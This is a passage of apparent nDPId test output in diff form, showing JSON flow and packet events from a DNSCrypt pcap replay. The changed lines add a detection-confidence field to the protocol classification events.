-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":307,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":60091,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwFwgAL0R2kAKAAABstjJ3syECAUGBG5EfSQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":308,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52356,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAIcwF1AAL0Rvf8KAAABstjJ3s99CAUCCD+NfSUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":53117,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":310,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwFwAub0R\/xMKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":310,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwF4gAL0R2j4KAAABstjJ3sv9CAUGBG7NfSIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":311,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAXcwF8gAL0R2j0KAAABstjJ3pbCCAUGBKQEfSYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAAFwgAMBb4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":312,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":38594,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":313,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwF4Aub0R\/xEKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":313,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00428{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":314,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAABQwF8Aub0R\/xAKAAABstjJ3gAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":314,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":946739317462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317462,"pkt":"REREREREZmZmZmZmCABFAAIcwGBAAL0RvfwKAAABstjJ3uV0CAUCCD+NfSMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAEAAAAAAAAAAAABxgAMAcIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
